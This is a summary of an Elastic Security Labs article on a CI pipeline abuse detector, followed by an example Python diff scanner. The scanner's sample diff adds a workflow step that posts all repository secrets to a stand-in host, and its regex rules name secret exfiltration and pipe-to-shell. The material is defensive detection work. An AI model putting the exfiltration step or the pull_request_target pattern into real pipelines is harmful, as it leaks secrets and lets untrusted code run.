Elastic Security Labs outlines how an open-source, drop-in CI template called cicd-abuse-detector can help catch abuse across GitHub Actions, GitLab CI, and Azure DevOps pipelines. Published on 29 April 2026 by Mika Ayenson, PhD, the piece explains that in 2025–2026 attackers shifted from targeting production servers to exploiting automation itself, using pipelines to exfiltrate secrets and pivot into cloud and production environments.
The detector combines 50+ regex signals with pipeline metadata, then feeds the full diffs to Claude via the Claude Code CLI for structured threat analysis; it requires no Python or complex dependencies. The project ships with 19 malicious and 4 benign example diffs and has been validated against real incidents such as Nord Stream, ArtiPACKED and HackerBot-Claw, among others.
It runs on all three platforms and aims to surface suspicious patterns at the pull request stage, enabling correlated alerts and cross-platform investigations through a unified data stream.
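As an added illustration of the regex-signal stage described above (example code, not the project's own detector, and the rules below are a constructed handful rather than its 50+ signals): a scanner that reads a unified diff, inspects only added lines, and weights each hit by whether it lands in a CI configuration file, which is the metadata a reviewer would want before escalating a pull request.

```python
import re

# Constructed signal set for this example; the real project's rules are not reproduced here.
SIGNALS = [
    ("pr_target_trigger", "high", re.compile(r"^\s*pull_request_target\s*:")),
    ("checkout_pr_head", "high", re.compile(r"ref:\s*\$\{\{\s*github\.event\.pull_request\.head\.(sha|ref)")),
    ("secrets_to_network", "high", re.compile(r"\b(curl|wget)\b.*(secrets\.\w+|toJSON\(secrets\))")),
    ("all_secrets_dump", "high", re.compile(r"toJSON\(secrets\)")),
    ("pipe_to_shell", "medium", re.compile(r"\b(curl|wget)\b[^|]*\|\s*(ba|z)?sh\b")),
    ("base64_decode", "low", re.compile(r"base64\s+(-d|--decode)\b")),
]
# Paths that are CI configuration on the three platforms the article covers.
CI_CONFIG = re.compile(r"(^|/)(\.github/workflows/[^/]+\.ya?ml|\.gitlab-ci\.ya?ml|azure-pipelines\.ya?ml)$")
LEVEL = {"none": 0, "low": 1, "medium": 2, "high": 3}

def scan_diff(diff_text):
    """Return one finding per (added line, matching signal) in a unified diff."""
    findings, path = [], None
    for line in diff_text.splitlines():
        if line.startswith("+++ "):            # new-file header: remember which file we are in
            path = line[4:]
            path = path[2:] if path.startswith("b/") else path
            continue
        if not line.startswith("+") or line.startswith("+++"):
            continue                            # context, removed lines and headers are not scanned
        added = line[1:]
        for name, severity, pattern in SIGNALS:
            if pattern.search(added):
                findings.append({"file": path, "signal": name, "severity": severity,
                                 "ci_config": bool(path and CI_CONFIG.search(path)),
                                 "line": added.strip()})
    return findings

def verdict(findings):
    """Worst severity seen; hits outside CI config files are capped at 'low'."""
    worst = "none"
    for f in findings:
        sev = f["severity"] if f["ci_config"] else "low"
        if LEVEL[sev] > LEVEL[worst]:
            worst = sev
    return worst

# Constructed sample diff: a PR that switches the trigger, checks out the PR head and sends secrets out.
SAMPLE_DIFF = """diff --git a/.github/workflows/ci.yml b/.github/workflows/ci.yml
--- a/.github/workflows/ci.yml
+++ b/.github/workflows/ci.yml
@@ -1,8 +1,10 @@
 name: ci
 on:
-  pull_request:
+  pull_request_target:
 jobs:
   build:
     steps:
       - uses: actions/checkout@v4
+        with:
+          ref: ${{ github.event.pull_request.head.sha }}
+      - run: curl -s -X POST -d "${{ toJSON(secrets) }}" https://example.invalid/collect
"""

if __name__ == "__main__":
    hits = scan_diff(SAMPLE_DIFF)
    for h in hits:
        print(f"{h['severity']:6} {h['signal']:20} {h['file']}: {h['line']}")
    print("verdict:", verdict(hits))
```

The same findings, serialised, are what a second stage such as the article's LLM review would receive alongside the raw diff.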